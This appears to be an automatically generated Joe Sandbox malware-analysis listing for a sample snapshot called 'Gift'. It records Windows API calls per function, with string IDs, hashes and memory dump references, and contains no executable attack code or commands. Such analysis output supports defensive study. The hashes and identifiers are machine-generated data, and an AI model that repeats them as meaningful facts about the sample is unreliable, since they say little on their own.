                                                                          • Instruction ID: 7dad904dcdb035a7ee7957071b36dacefe072c942f16f04a20fdf37476debccf
                                                                          • Opcode Fuzzy Hash: aba23f1cecda9b745166ab2a3d6a37943cff6bcff16c669cf5a55f31fd802870
                                                                          • Instruction Fuzzy Hash: 4F918C706083419FC711EF24C48595EBBE9EF89354F14896EF89A8B3A2DB30ED45CB52
                                                                          APIs
                                                                            • Part of subcall function 002E436A: _wcscpy.LIBCMT ref: 002E438D
                                                                          • _memset.LIBCMT ref: 0033332E
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0033335D
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00333410
                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0033343E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                          • String ID: 0
                                                                          • API String ID: 4152858687-4108050209
                                                                          • Opcode ID: 07f94c0cf08f1a4150f9cc9368c2686c88768d53ce4691e76a664c7417eca054
                                                                          • Instruction ID: 098a3ae5e86f81b37147e1c78ac538dfa73468a7b077233e00765a8a43caf830
                                                                          • Opcode Fuzzy Hash: 07f94c0cf08f1a4150f9cc9368c2686c88768d53ce4691e76a664c7417eca054
                                                                          • Instruction Fuzzy Hash: A951DE316183019BD717AF29C885A6BBBE8AF45360F058A2EF895D31E1DB70CE54CB52
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00332F67
                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00332F83
                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00332FC9
                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00397890,00000000), ref: 00333012
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                          • String ID: 0
                                                                          • API String ID: 1173514356-4108050209
                                                                          • Opcode ID: d22873547beae6a938ac7bc9b6fae98beca314efb20e5b35e00c7dd36bb33c20
                                                                          • Instruction ID: 9eb212c82df5bc4bb82b44b73bd7942cd4d5021bebab7bd76b582c80f6be37e9
                                                                          • Opcode Fuzzy Hash: d22873547beae6a938ac7bc9b6fae98beca314efb20e5b35e00c7dd36bb33c20
                                                                          • Instruction Fuzzy Hash: 8B41B4312043419FD725DF24C885B5BBBE8BF85320F11862EF5A69B291D770E905CB52
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00329ACC
                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00329ADF
                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00329B0F
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$_memmove$ClassName
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 365058703-1403004172
                                                                          • Opcode ID: bfb61cff4cd769c8311c54ef77ec6ac41f6d2728dc417f4452b8b0a5b02b9bd9
                                                                          • Instruction ID: b426f0a35fe17ec9904643bad5976bf4870c4de57b770c8a0a24e083bba2a38e
                                                                          • Opcode Fuzzy Hash: bfb61cff4cd769c8311c54ef77ec6ac41f6d2728dc417f4452b8b0a5b02b9bd9
                                                                          • Instruction Fuzzy Hash: 74213571941104BEDB1AEBA4EC86DFFB77CDF45360F50412AF825972E1DB740D658A20
                                                                          APIs
                                                                            • Part of subcall function 002D2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002D214F
                                                                            • Part of subcall function 002D2111: GetStockObject.GDI32(00000011), ref: 002D2163
                                                                            • Part of subcall function 002D2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 002D216D
                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00356A86
                                                                          • LoadLibraryW.KERNEL32(?), ref: 00356A8D
                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00356AA2
                                                                          • DestroyWindow.USER32(?), ref: 00356AAA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                          • String ID: SysAnimate32
                                                                          • API String ID: 4146253029-1011021900
                                                                          • Opcode ID: adc0c5519fb8d4add386db9cf11adfc4453242306ef94dab8cf3775b398ec89d
                                                                          • Instruction ID: d82fa60f85bafea2cc404f308e09a12aee285b3b889770f592da8b812ec1329d
                                                                          • Opcode Fuzzy Hash: adc0c5519fb8d4add386db9cf11adfc4453242306ef94dab8cf3775b398ec89d
                                                                          • Instruction Fuzzy Hash: CA21CDB1210205AFEF228FA4DC82EBB37ACEB59325F918619FE11A31B0D371CC549760
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00337377
                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003373AA
                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 003373BC
                                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003373F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$FilePipe
                                                                          • String ID: nul
                                                                          • API String ID: 4209266947-2873401336
                                                                          • Opcode ID: ff947f01003df0e7c49deb889da866a1ddcd1d5ece5d9adc86898234d8984ff0
                                                                          • Instruction ID: 6c478cd002c91f64c6aa5b1952cbe4f13c3fdda1729e2bc6e4f22a5349a51fe6
                                                                          • Opcode Fuzzy Hash: ff947f01003df0e7c49deb889da866a1ddcd1d5ece5d9adc86898234d8984ff0
                                                                          • Instruction Fuzzy Hash: 3521A7B450430AABDB329F65DC85A9E77E8AF45730F204A19FCA0D72D0D7B0D854DB90
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00337444
                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00337476
                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00337487
                                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003374C1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$FilePipe
                                                                          • String ID: nul
                                                                          • API String ID: 4209266947-2873401336
                                                                          • Opcode ID: 5d24e3ec4eb3031a9a90346d0410dcbf45d0224dad18f8e54e78a44e385116c1
                                                                          • Instruction ID: addfe85ea295a71048c71255a66fe067a3e33443411731cf13b7537ee4865d68
                                                                          • Opcode Fuzzy Hash: 5d24e3ec4eb3031a9a90346d0410dcbf45d0224dad18f8e54e78a44e385116c1
                                                                          • Instruction Fuzzy Hash: B821A4B150830A9BDB319F6A9C85A9A7BA8AF55730F204B19F9A0D72D0DB70E851CB50
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0033B297
                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0033B2EB
                                                                          • __swprintf.LIBCMT ref: 0033B304
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00360980), ref: 0033B342
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                          • String ID: %lu
                                                                          • API String ID: 3164766367-685833217
                                                                          • Opcode ID: cef89fba41d354a3054d6c9564280d7c7694c5431db2217b8a79dfab97939e52
                                                                          • Instruction ID: 0bf7c6a42f115ebdd286820714561d6f050e4b4484b00c847b562deb3d6da377
                                                                          • Opcode Fuzzy Hash: cef89fba41d354a3054d6c9564280d7c7694c5431db2217b8a79dfab97939e52
                                                                          • Instruction Fuzzy Hash: 86219034A00108AFCB11EF65C885DAEB7B8EF49704F108469F905DB352DB71EE15CB61
                                                                          APIs
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                            • Part of subcall function 0032AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0032AA6F
                                                                            • Part of subcall function 0032AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0032AA82
                                                                            • Part of subcall function 0032AA52: GetCurrentThreadId.KERNEL32 ref: 0032AA89
                                                                            • Part of subcall function 0032AA52: AttachThreadInput.USER32(00000000), ref: 0032AA90
                                                                          • GetFocus.USER32 ref: 0032AC2A
                                                                            • Part of subcall function 0032AA9B: GetParent.USER32(?), ref: 0032AAA9
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0032AC73
                                                                          • EnumChildWindows.USER32(?,0032ACEB), ref: 0032AC9B
                                                                          • __swprintf.LIBCMT ref: 0032ACB5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                          • String ID: %s%d
                                                                          • API String ID: 1941087503-1110647743
                                                                          • Opcode ID: ea87f62e144329da93fab843c2add2e3908fcb1b224590e20903717cf6ff817b
                                                                          • Instruction ID: 1f929db8b4e95c5a2071db959241cc396910006c7473901084962e0dab9da375
                                                                          • Opcode Fuzzy Hash: ea87f62e144329da93fab843c2add2e3908fcb1b224590e20903717cf6ff817b
                                                                          • Instruction Fuzzy Hash: A711E174600625ABDF16BFA0ED86FEA77BCEF44300F008075FE08AA142DAB05955CBB1
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00332318
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                          • API String ID: 3964851224-769500911
                                                                          • Opcode ID: d50726884fc9c77ea7d796bb43116350ab95ab0673a4c464c81ea19637568e5c
                                                                          • Instruction ID: 7c693b23c272839a8f0076ec6bea885b44f88f628ba7397538cf27ee7398dc31
                                                                          • Opcode Fuzzy Hash: d50726884fc9c77ea7d796bb43116350ab95ab0673a4c464c81ea19637568e5c
                                                                          • Instruction Fuzzy Hash: E5115A3895021D9BDF01EF94D8914BEB3B8FF19344F5084A9D811A7262EB365D1ACF40
                                                                          APIs
                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0034F2F0
                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0034F320
                                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0034F453
                                                                          • CloseHandle.KERNEL32(?), ref: 0034F4D4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                          • String ID:
                                                                          • API String ID: 2364364464-0
                                                                          • Opcode ID: 4f28ce09d090a72be4dd36f180ed1fab0d8a161f0dab5272f521e1fdfb785eb3
                                                                          • Instruction ID: 40eff799b08ec03555ef4c3e0914b020db2fed8a28a1e4a57eaeacc3069a166a
                                                                          • Opcode Fuzzy Hash: 4f28ce09d090a72be4dd36f180ed1fab0d8a161f0dab5272f521e1fdfb785eb3
                                                                          • Instruction Fuzzy Hash: 6C8190716103009FD721EF28D886B2AB7E5AF48714F14891EF999DB392DBB0AD508F91
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0035147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0035040D,?,?), ref: 00351491
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0035075D
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0035079C
                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003507E3
                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 0035080F
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0035081C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                          • String ID:
                                                                          • API String ID: 3440857362-0
                                                                          • Opcode ID: 0cec77c6acd8b38ab8dffa6884f05fc417679b6d49bcaec80e0e5fca95f7cdd0
                                                                          • Instruction ID: f6587539618d64c4e99c57474fa37615c302c9a65f68e69b614d843a4e08a294
                                                                          • Opcode Fuzzy Hash: 0cec77c6acd8b38ab8dffa6884f05fc417679b6d49bcaec80e0e5fca95f7cdd0
                                                                          • Instruction Fuzzy Hash: 34516A71218244AFC709EF64C881F6AB7E9BF88305F04892DF995872A1DB71E918CF52
                                                                          APIs
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0033EC62
                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0033EC8B
                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0033ECCA
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0033ECEF
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0033ECF7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 1389676194-0
                                                                          • Opcode ID: 0df9ba0d79cb6aad88038d4640322911fd9e19b6c74fcd5474dc7fcddc203cf8
                                                                          • Instruction ID: d8e15d0e1c516dd49b5828edc42284abd785151c4f9cf74bcfc078fd836c5d71
                                                                          • Opcode Fuzzy Hash: 0df9ba0d79cb6aad88038d4640322911fd9e19b6c74fcd5474dc7fcddc203cf8
                                                                          • Instruction Fuzzy Hash: 18513935A10109DFCB05EF64C985AAEBBF5EF08314F148499E849AB3A2CB31ED61DF50
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bee4f7fde7b1b89b40a6a6da15b58ddd4643a1598f042e201ee555a91d917107
                                                                          • Instruction ID: f9d19e3567c4c197d36693c681cb467bb45c4d7649dfeaaffa5d2cd15f495602
                                                                          • Opcode Fuzzy Hash: bee4f7fde7b1b89b40a6a6da15b58ddd4643a1598f042e201ee555a91d917107
                                                                          • Instruction Fuzzy Hash: B7410635904504AFD712CBA4CC89FAABBB8EB0D312F164265FC16A72F1C7709E05EA61
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 002D2727
                                                                          • ScreenToClient.USER32(003977B0,?), ref: 002D2744
                                                                          • GetAsyncKeyState.USER32(00000001), ref: 002D2769
                                                                          • GetAsyncKeyState.USER32(00000002), ref: 002D2777
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                          • String ID:
                                                                          • API String ID: 4210589936-0
                                                                          • Opcode ID: 1263b8823ce647b018fb86b8abd74056a8399cf3426c566b77f5d60eacb7bf48
                                                                          • Instruction ID: fbf0c2e14f26acb27ff9cc20b4beb45b6508bdff3fca7d7098ad954547f8c8ef
                                                                          • Opcode Fuzzy Hash: 1263b8823ce647b018fb86b8abd74056a8399cf3426c566b77f5d60eacb7bf48
                                                                          • Instruction Fuzzy Hash: BE416D35524109FBDF2A9F68C844AE9FB74FB15324F10835AF829962E0C734ADA4DF91
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 003295E8
                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00329692
                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0032969A
                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 003296A8
                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003296B0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostSleep$RectWindow
                                                                          • String ID:
                                                                          • API String ID: 3382505437-0
                                                                          • Opcode ID: 2cac497ddb2c5828a754ddb6eabe4640ccc69e773e5b850f6f62b152e0f59701
                                                                          • Instruction ID: c0fe8ca5bdce05b42d8799bd2abbac21b3ce9bd70843544f58aa6a7a915dd3c5
                                                                          • Opcode Fuzzy Hash: 2cac497ddb2c5828a754ddb6eabe4640ccc69e773e5b850f6f62b152e0f59701
                                                                          • Instruction Fuzzy Hash: 2331C071500229EFDB15CF68ED4DB9E7BB9FB45325F11821AF924AB1D0C3B09924DB90
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0035B804
                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0035B829
                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0035B841
                                                                          • GetSystemMetrics.USER32(00000004), ref: 0035B86A
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0034155C,00000000), ref: 0035B888
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
